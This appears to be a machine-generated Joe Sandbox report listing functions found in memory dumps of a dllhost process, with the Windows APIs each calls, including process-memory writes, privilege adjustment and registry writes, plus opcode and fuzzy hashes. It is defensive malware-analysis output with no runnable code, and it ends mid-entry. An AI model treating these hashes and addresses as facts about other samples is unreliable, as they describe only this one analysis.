Function 0073B32F Relevance: 1.6, APIs: 1, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 0073B3AF

Memory Dump Source

Source File: 00000025.00000002.1979212671.000000000073A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0073A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_73a000_dllhost.jbxd

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: e463a2a3c8524da00bb48e3aad9a2c5546dd645aeafb094cc0fbd70a87641be4
Instruction ID: b068b320457eee2366b845c11fde5ef232f006e4d83e3f4f4e1b1b2d64b6f280
Opcode Fuzzy Hash: e463a2a3c8524da00bb48e3aad9a2c5546dd645aeafb094cc0fbd70a87641be4
Instruction Fuzzy Hash: 2821A1765097809FEB228F25DC44B52BFF4EF06310F0885DAE9858B163D375A918DB62

Function 0073B4B1 Relevance: 1.6, APIs: 1, Instructions: 57nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 0073B51D

Memory Dump Source

Source File: 00000025.00000002.1979212671.000000000073A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0073A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_73a000_dllhost.jbxd

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: c971cd65ddf0da275c4a00adb596c12e0ced8bcc226bf49e542846344519451a
Instruction ID: 2fbba351571051a1f865ec0e7333bb24bd4ae4154a422e73e80cbc2f3cdbcfd7
Opcode Fuzzy Hash: c971cd65ddf0da275c4a00adb596c12e0ced8bcc226bf49e542846344519451a
Instruction Fuzzy Hash: 441190724093C09FDB228F15DC45A52FFF4EF16324F0980DAE9848B163D265A918CB62

Function 0073B366 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 0073B3AF

Memory Dump Source

Source File: 00000025.00000002.1979212671.000000000073A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0073A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_73a000_dllhost.jbxd

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: a84b881b27d929ddc301ccc5b66a3a852b53721dfb1c63b383d7e60ca92e8a2c
Instruction ID: e5bdf7147d5650c2790fab2b9d3fe6233696c0744d58a6fe24001da57040f7a1
Opcode Fuzzy Hash: a84b881b27d929ddc301ccc5b66a3a852b53721dfb1c63b383d7e60ca92e8a2c
Instruction Fuzzy Hash: 751182755047449FEB21CF55D984B66FBE4EF04320F08C8AAEE458B662D336E814DF61

Function 0073B4E2 Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 0073B51D

Memory Dump Source

Source File: 00000025.00000002.1979212671.000000000073A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0073A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_73a000_dllhost.jbxd

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: f10da00d4844485f7e259fa044f9b588360a5cc8db3f760ec77a8f002b90e40d
Instruction ID: 220b34b4b5d464d53bdda55569e691f570a0e948ac9344d88ad958314358dab0
Opcode Fuzzy Hash: f10da00d4844485f7e259fa044f9b588360a5cc8db3f760ec77a8f002b90e40d
Instruction Fuzzy Hash: 6B01A2754042409FEB218F15D985B61FBE0EF48320F08C49ADE454B262C376E828DFA2

Function 04840080 Relevance: 2.6, Strings: 2, Instructions: 73
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

dS|l, xrefs: 048401B9
:@Ul, xrefs: 04840100

Memory Dump Source

Source File: 00000025.00000002.1991197780.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID: :@Ul$dS|l
API String ID: 0-1394735054
Opcode ID: cf8fe168ba3d97da5eb5d8cfd18eb2863a71a4eb4f65499fb9ae6c357e00d126
Instruction ID: a6b4755fcf3bf8fe16de957e5c9895ac52375830f85e71fd57d87113e119dac1
Opcode Fuzzy Hash: cf8fe168ba3d97da5eb5d8cfd18eb2863a71a4eb4f65499fb9ae6c357e00d126
Instruction Fuzzy Hash: CC31B538500600CBD308EF36EE56618BBE27F85308F44C13EC5084B23AEFB85A1ADB85

Function 04840090 Relevance: 2.6, Strings: 2, Instructions: 69
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

dS|l, xrefs: 048401B9
:@Ul, xrefs: 04840100

Memory Dump Source

Source File: 00000025.00000002.1991197780.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID: :@Ul$dS|l
API String ID: 0-1394735054
Opcode ID: 076e5336ae4bf09bedd456b06003be384f10e139a48bd11849fcaceeeccabb13
Instruction ID: 1e9c26b0e68107f4820f1742711cde2356151737f9e00978559c2c089dc467d3
Opcode Fuzzy Hash: 076e5336ae4bf09bedd456b06003be384f10e139a48bd11849fcaceeeccabb13
Instruction Fuzzy Hash: 9F216438500605CBD308EB76FE56659BBE27F85304F54C13EC5084B279EFB85A1ADB89

Function 04910A46 Relevance: 2.5, Strings: 2, Instructions: 16
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

E, xrefs: 04910A49
5, xrefs: 04910A6C

Memory Dump Source

Source File: 00000025.00000002.1991244078.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_4910000_dllhost.jbxd

Similarity

API ID:
String ID: 5$E
API String ID: 0-717204176
Opcode ID: 491879e0e7388f19a6e27a6667e54569b721d391b8998e9dd4037d1750aab235
Instruction ID: cec8cec7d2d4045e9fae41648aa11942051937bc7d834d6d91936b4d94881987
Opcode Fuzzy Hash: 491879e0e7388f19a6e27a6667e54569b721d391b8998e9dd4037d1750aab235
Instruction Fuzzy Hash: 79D05E7090624ACFCB418F60D81959C3BB5EF52355B44871E80019E69ADB3D4515DB02

Function 04910140 Relevance: 2.5, Strings: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

B, xrefs: 04910144
/, xrefs: 0491065E

Memory Dump Source

Source File: 00000025.00000002.1991244078.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_4910000_dllhost.jbxd

Similarity

API ID:
String ID: /$B
API String ID: 0-2775194069
Opcode ID: 45132bbc3f48af2535a8330cf3b2fc5f762a498f754be3bef09b0b8c808eaf8a
Instruction ID: bc60dc70a78e2577ccf24bf991f1340bf7292c5341da7e7ba0440ae216ffd7b4
Opcode Fuzzy Hash: 45132bbc3f48af2535a8330cf3b2fc5f762a498f754be3bef09b0b8c808eaf8a
Instruction Fuzzy Hash: 5ED02B64A062488BDB015FA085183683FB19F02240F008AB5C10AAF2D3EA3C54408712

Function 0073A793 Relevance: 1.6, APIs: 1, Instructions: 98
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0073A849

Memory Dump Source

Source File: 00000025.00000002.1979212671.000000000073A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0073A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_73a000_dllhost.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 66c9ad802c72dc432411ddfe2046209e135c6bf36b506a9cd8e5934a20871989
Instruction ID: 690780fbe55692a09bfdaa61eeda7dc5002bee954bac2576ef3576f0803e37d0
Opcode Fuzzy Hash: 66c9ad802c72dc432411ddfe2046209e135c6bf36b506a9cd8e5934a20871989
Instruction Fuzzy Hash: 6C3181B55053806FE722CB25DC45F62BFF8EF06314F08849EE9858B162D375A909CB62

Function 0073B62E Relevance: 1.6, APIs: 1, Instructions: 89
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNELBASE(?,?), ref: 0073B6D5

Memory Dump Source

Source File: 00000025.00000002.1979212671.000000000073A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0073A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_73a000_dllhost.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: b31b31e1499af31925f03804ab336e20394bd161e987d71ee635969f324050d2
Instruction ID: 8cbe2492a7412f288e7967e87b8dbfca94a002b45da14bf8d8a74249ad853aa7
Opcode Fuzzy Hash: b31b31e1499af31925f03804ab336e20394bd161e987d71ee635969f324050d2
Instruction Fuzzy Hash: 0F31AFB55093806FE711CB25CC85B66BFF8EF46310F08849AE984CB293D375A908C762

Function 0073A120 Relevance: 1.6, APIs: 1, Instructions: 86
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindNextFileW.KERNELBASE(?,00000E24,?,?), ref: 0073A1C2

Memory Dump Source

Source File: 00000025.00000002.1979212671.000000000073A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0073A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_73a000_dllhost.jbxd

Similarity

API ID: FileFindNext
String ID:
API String ID: 2029273394-0
Opcode ID: 95c2d28969b3d5a55eb93dd71054ab535417aed9722a78ab28bb4cdfa8ca7b70
Instruction ID: 9286f49c1451fee2a03b036288b425cd3b8aaa708bbc5c4b623bdd99fba587da
Opcode Fuzzy Hash: 95c2d28969b3d5a55eb93dd71054ab535417aed9722a78ab28bb4cdfa8ca7b70
Instruction Fuzzy Hash: 4731827140D3C06FD3128B258C55BA6BFB4EF47620F0A45DBD8C48F1A3D269A91AC7A2

Function 0073AF4A Relevance: 1.6, APIs: 1, Instructions: 85
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExW.KERNELBASE(?,00000E24,AD0EC722,00000000,00000000,00000000,00000000), ref: 0073AFF0

Memory Dump Source

Source File: 00000025.00000002.1979212671.000000000073A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0073A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_73a000_dllhost.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 8d05949f99d50fee53d433b043c2c10d1a613a6a8f1e74afc809e92df29f9c72
Instruction ID: 3837c0e28f91065a4835f913bed1844a2fb5976067aa7eb0e908a3ec7a54e967
Opcode Fuzzy Hash: 8d05949f99d50fee53d433b043c2c10d1a613a6a8f1e74afc809e92df29f9c72
Instruction Fuzzy Hash: 8E2161B65087406FE722CF15CC45FA6BBF8EF46720F08849AE985CB193D365E908C762

Function 0073A8A0 Relevance: 1.6, APIs: 1, Instructions: 80
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileType.KERNELBASE(?,00000E24,AD0EC722,00000000,00000000,00000000,00000000), ref: 0073A935

Memory Dump Source

Source File: 00000025.00000002.1979212671.000000000073A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0073A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_73a000_dllhost.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 555add3a40f885685d771e0f92277e7f04f0caf45e5430a122e79d7d42f3a860
Instruction ID: e87bd1fb9fce22142eac4948eedb43a42edf93d109232800421e01b3888d990e
Opcode Fuzzy Hash: 555add3a40f885685d771e0f92277e7f04f0caf45e5430a122e79d7d42f3a860
Instruction Fuzzy Hash: 18210DB54097806FE7128B21DC45B76BFBCDF47720F0980DAE9849B1A3D264AD09C772

Function 0073B046 Relevance: 1.6, APIs: 1, Instructions: 77
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegSetValueExW.KERNELBASE(?,00000E24,AD0EC722,00000000,00000000,00000000,00000000), ref: 0073B0DC

Memory Dump Source

Source File: 00000025.00000002.1979212671.000000000073A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0073A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_73a000_dllhost.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: eae6b66614b56b6904457eaa9bfbc4aa757cf4654f9607e9cbcedf55844eecef
Instruction ID: 15d3d0c6df1d94b9e784aac2c27121190f6ec1e2072ab77d9da681f368092e0f
Opcode Fuzzy Hash: eae6b66614b56b6904457eaa9bfbc4aa757cf4654f9607e9cbcedf55844eecef
Instruction Fuzzy Hash: 0A2192765087806FE7228B11DC45F67BFF8DF45310F08849AE9858B153D364E808C771

Function 0073A7CA Relevance: 1.6, APIs: 1, Instructions: 76
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0073A849

Memory Dump Source

Source File: 00000025.00000002.1979212671.000000000073A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0073A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_73a000_dllhost.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: f0c68fa67e37ead4b4697edf458af45289896954a1cdea52ced8ec841959d9a7
Instruction ID: e2a3936a0b50f5f7d2ac045b98004e9eec27c41aff6d785c3dfdce8673112395
Opcode Fuzzy Hash: f0c68fa67e37ead4b4697edf458af45289896954a1cdea52ced8ec841959d9a7
Instruction Fuzzy Hash: 942192B5504240AFFB21CF65DD46FA6FBE8EF04324F04885EEA858B252D375E905CB62

Function 0073AD1A Relevance: 1.6, APIs: 1, Instructions: 74
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLogicalDrives.KERNELBASE ref: 0073ADA1

Memory Dump Source

Source File: 00000025.00000002.1979212671.000000000073A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0073A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_73a000_dllhost.jbxd

Similarity

API ID: DrivesLogical
String ID:
API String ID: 999431828-0
Opcode ID: 947c7377f1d56ab0590049675ad840dd1ed794634996443f0155ddd7b63df4d4
Instruction ID: c28022b78021ba2fd45850302db77c29f975c61fdc393f1c6f637057f104ca44
Opcode Fuzzy Hash: 947c7377f1d56ab0590049675ad840dd1ed794634996443f0155ddd7b63df4d4
Instruction Fuzzy Hash: 0821597140E3C09FD7138B259C65A92BFB4EF47220F0A84DBD985CF1A3D2296809CB72

Function 0073B662 Relevance: 1.6, APIs: 1, Instructions: 72
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNELBASE(?,?), ref: 0073B6D5

Memory Dump Source

Source File: 00000025.00000002.1979212671.000000000073A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0073A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_73a000_dllhost.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 9ea9343b910ee25ca575cc7235e68b6cce927f29ab57340fced8df6a811b5945
Instruction ID: fa8d9c120edaddb72e2069f3bc007fbf0eb084ec6d59f864f781c62e02bbbd7e
Opcode Fuzzy Hash: 9ea9343b910ee25ca575cc7235e68b6cce927f29ab57340fced8df6a811b5945
Instruction Fuzzy Hash: AB219F755042449FF720DF25DD86BA6FBE8EF44324F0884AAEE448B292D775E904CA72

Function 0073AA52 Relevance: 1.6, APIs: 1, Instructions: 70
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadFile.KERNELBASE(?,00000E24,AD0EC722,00000000,00000000,00000000,00000000), ref: 0073AAD1

Memory Dump Source

Source File: 00000025.00000002.1979212671.000000000073A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0073A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_73a000_dllhost.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: de4c00fe4a7ba7bbac76d34e9cbb6e963c72abeece7e8b1ffd0563d208794a08
Instruction ID: 62756c30407a4a83215630e2e5c7a8e39efed67d467ee11c4f262ffc507e93db
Opcode Fuzzy Hash: de4c00fe4a7ba7bbac76d34e9cbb6e963c72abeece7e8b1ffd0563d208794a08
Instruction Fuzzy Hash: AE217FB6409380AFE7228F51DC45F66BBB8EF45320F08849AE9858B152D265A508CBA2

Function 0073AF76 Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000E24,AD0EC722,00000000,00000000,00000000,00000000), ref: 0073AFF0

Memory Dump Source

Source File: 00000025.00000002.1979212671.000000000073A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0073A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_73a000_dllhost.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 91517dadbffda1abb2ffe63e0982eaf80e09633a0d81d68b727433e75b2dae69
Instruction ID: 73a7d77748785c42be993bb720da3609bae42cd97bc2b31370d932553949644b
Opcode Fuzzy Hash: 91517dadbffda1abb2ffe63e0982eaf80e09633a0d81d68b727433e75b2dae69
Instruction Fuzzy Hash: C8218EB9504604AFF721CF15CC85F67F7ECEF04710F08845AEA858B292D764E944CAB2

Function 0073A589 Relevance: 1.6, APIs: 1, Instructions: 67injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0073A608

Memory Dump Source

Source File: 00000025.00000002.1979212671.000000000073A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0073A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_73a000_dllhost.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 076156cd2a0bfb5ad34fd9b0dafbfb328260f3add015586c7bea09f136043fa9
Instruction ID: 960e8615d79f6e628e256b446d14c60a4370289d19d69b7df81602817bc9f882
Opcode Fuzzy Hash: 076156cd2a0bfb5ad34fd9b0dafbfb328260f3add015586c7bea09f136043fa9
Instruction Fuzzy Hash: BB218E754093C09FDB128F21DC45A52FFB4EF17310F0D84CAE9848B1A3D265A959DB62

Function 0073ADE8 Relevance: 1.6, APIs: 1, Instructions: 66fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNELBASE(?,?,?), ref: 0073AE56

Memory Dump Source

Source File: 00000025.00000002.1979212671.000000000073A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0073A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_73a000_dllhost.jbxd

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 1b4559ddfac606bcf303c2970fcd0f06f699edd7d86b9ca9c542e4d23c09706c
Instruction ID: 0a84cbb404233a49f57d0d99aef6ac4e7570c8388aceb0d240e353b58afcfc2d
Opcode Fuzzy Hash: 1b4559ddfac606bcf303c2970fcd0f06f699edd7d86b9ca9c542e4d23c09706c
Instruction Fuzzy Hash: 302163715093805FD711CF65DC86B52BFE8EF46720F0884AAED85CB263D225E854CB61

Function 0073B06A Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegSetValueExW.KERNELBASE(?,00000E24,AD0EC722,00000000,00000000,00000000,00000000), ref: 0073B0DC

Memory Dump Source

Source File: 00000025.00000002.1979212671.000000000073A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0073A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_73a000_dllhost.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 32933bb59b98a29305b4a888564e65df70a85c62efc1bdea712f505d6737884b
Instruction ID: 1b015b06a0692eea1f071e1e8960cf6515791e373265aaa8dea6917df573e5cd
Opcode Fuzzy Hash: 32933bb59b98a29305b4a888564e65df70a85c62efc1bdea712f505d6737884b
Instruction Fuzzy Hash: B6118EB6504604AFFB218E15DC85B67FBECEF04724F08845AEE459B292D775E804CAB2

Function 0073B1C6 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 0073B22E

Memory Dump Source

Source File: 00000025.00000002.1979212671.000000000073A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0073A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_73a000_dllhost.jbxd

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: b6f07d780f6216c77b72e3051684d5ee4a694ce14f69361dc12a8e8ad95b8f25
Instruction ID: ec8794196c2c82925f2211246c4ce7b8ea6364b69bd429fe73562b4d0d4cf7bd
Opcode Fuzzy Hash: b6f07d780f6216c77b72e3051684d5ee4a694ce14f69361dc12a8e8ad95b8f25
Instruction Fuzzy Hash: 741181B1605380AFEB11CF25DC45B57BFE8EF45720F0884AAED45CB252D365E804CB61

Function 0073AA72 Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,00000E24,AD0EC722,00000000,00000000,00000000,00000000), ref: 0073AAD1

Memory Dump Source

Source File: 00000025.00000002.1979212671.000000000073A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0073A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_73a000_dllhost.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: cfdc61413827153550491046e26d831f677cd1c80d567c8de0ea9528c772c2c1
Instruction ID: 06b6b719a3cec0e4fc007cdd859cd542521f117d05687bd3c190508237928eb8
Opcode Fuzzy Hash: cfdc61413827153550491046e26d831f677cd1c80d567c8de0ea9528c772c2c1
Instruction Fuzzy Hash: F611B276504600AFFB21CF51DD45FAAFBE8EF44724F04845AEA858B252D375A404CBB2

Function 0073A63B Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(?), ref: 0073A6A8

Memory Dump Source

Source File: 00000025.00000002.1979212671.000000000073A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0073A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_73a000_dllhost.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 721427791b17e5ec59b9d71fa1a9d0d68dd01af2487b4620552318571230fd79
Instruction ID: 13afd5aa2e3b708e846a5f3add8d557815f37f84a063cf0e13a61722ecafce0a
Opcode Fuzzy Hash: 721427791b17e5ec59b9d71fa1a9d0d68dd01af2487b4620552318571230fd79
Instruction Fuzzy Hash: 161190B54097C09FEB128B21DC85692BFB4EF07324F0984DBDCC94F163D265A949CB62

Function 0073B1E6 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 0073B22E

Memory Dump Source

Source File: 00000025.00000002.1979212671.000000000073A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0073A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_73a000_dllhost.jbxd

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 26646cc393520890799d8ff2fc584691716992826444db3d513d9acc695388d0
Instruction ID: 0a1011996b64964e0f5de733bf4fb854fb78a036fe8edfffe0728d32ecb40561
Opcode Fuzzy Hash: 26646cc393520890799d8ff2fc584691716992826444db3d513d9acc695388d0
Instruction Fuzzy Hash: CD11A5716042409FEB50CF29DC85757FBD8EF44720F08C5AADE45CB652D779E804CA61

Function 0073AE0E Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNELBASE(?,?,?), ref: 0073AE56

Memory Dump Source

Source File: 00000025.00000002.1979212671.000000000073A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0073A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_73a000_dllhost.jbxd

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 26646cc393520890799d8ff2fc584691716992826444db3d513d9acc695388d0
Instruction ID: 5ea2a22b6fc752bbc74cc37c7ceeb9620a84710150c1a8a23b91c988b8aec0db
Opcode Fuzzy Hash: 26646cc393520890799d8ff2fc584691716992826444db3d513d9acc695388d0
Instruction Fuzzy Hash: 741165756042409FFB50CF25DD86B56FBD8EF04720F08C46AED85CB252D779E814CA62

Function 0073A8E2 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(?,00000E24,AD0EC722,00000000,00000000,00000000,00000000), ref: 0073A935

Memory Dump Source

Source File: 00000025.00000002.1979212671.000000000073A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0073A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_73a000_dllhost.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: f417e9af09cbe2666db4261edd5fcda671809c7ededf766d8b11db7e600925d0
Instruction ID: aeb527f80b25bee62033ea37008d78087de26a90822416fc398f56a4fb9db70c
Opcode Fuzzy Hash: f417e9af09cbe2666db4261edd5fcda671809c7ededf766d8b11db7e600925d0
Instruction Fuzzy Hash: A801C479504204AEF710CB15DC86BBAF7DCDF44724F15C09AEE449B252D378A9048AA6

Function 0073AC8C Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(?), ref: 0073ACE0

Memory Dump Source

Source File: 00000025.00000002.1979212671.000000000073A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0073A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_73a000_dllhost.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: a290b86aae1aca5bd87ba6da1e5ff51744bdeda2ef69291d853545b6398284f9
Instruction ID: c378bf86ac3c88e4f09f2868ae59d1e6dd06af3f51b1fb462801556c656a6a77
Opcode Fuzzy Hash: a290b86aae1aca5bd87ba6da1e5ff51744bdeda2ef69291d853545b6398284f9
Instruction Fuzzy Hash: C311A5755093809FDB128F25DC85B52FFB4DF46220F0880DBED858B6A3D265A908CB62

Function 0073A172 Relevance: 1.5, APIs: 1, Instructions: 47fileCOMMON

Download Yara Rule

APIs

FindNextFileW.KERNELBASE(?,00000E24,?,?), ref: 0073A1C2

Memory Dump Source

Source File: 00000025.00000002.1979212671.000000000073A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0073A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_73a000_dllhost.jbxd

Similarity

API ID: FileFindNext
String ID:
API String ID: 2029273394-0
Opcode ID: c9da36478210af7913c544b082b4adf614e84b2f646ca4069ef8145fa132eb66
Instruction ID: 1ffa4bcd99c38d163edee1bda64a577b764b2c5b267594aca69e1cb894417d87
Opcode Fuzzy Hash: c9da36478210af7913c544b082b4adf614e84b2f646ca4069ef8145fa132eb66
Instruction Fuzzy Hash: E1015EB1500200ABD210DF16DC45B76FBE8EB88A20F14856AED089B751D775B9158AE6

Function 0073A5C2 Relevance: 1.5, APIs: 1, Instructions: 43injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0073A608

Memory Dump Source

Source File: 00000025.00000002.1979212671.000000000073A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0073A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_73a000_dllhost.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 0196702d48a10bd9cdbef377adfd9d48a5a82f4baaf719a42ada871e92858e07
Instruction ID: 1d4db493adfbbbab75a56761c1d1221a3069327bde859e0446783b55f8a67894
Opcode Fuzzy Hash: 0196702d48a10bd9cdbef377adfd9d48a5a82f4baaf719a42ada871e92858e07
Instruction Fuzzy Hash: F4018075504240DFEB20CF15D886B61FBE4EF14320F0C849ADE854B262D376E858DF62

Function 0073ACAE Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(?), ref: 0073ACE0

Memory Dump Source

Source File: 00000025.00000002.1979212671.000000000073A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0073A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_73a000_dllhost.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 1988891f03eec005d4f412dcd243dada9d6e2ae7fc05e4289fca40a72b9b1f48
Instruction ID: b12bdb61128db70ae61bb4cc93240c94c616cf1ef989f1b9b39f37a76cdb474c
Opcode Fuzzy Hash: 1988891f03eec005d4f412dcd243dada9d6e2ae7fc05e4289fca40a72b9b1f48
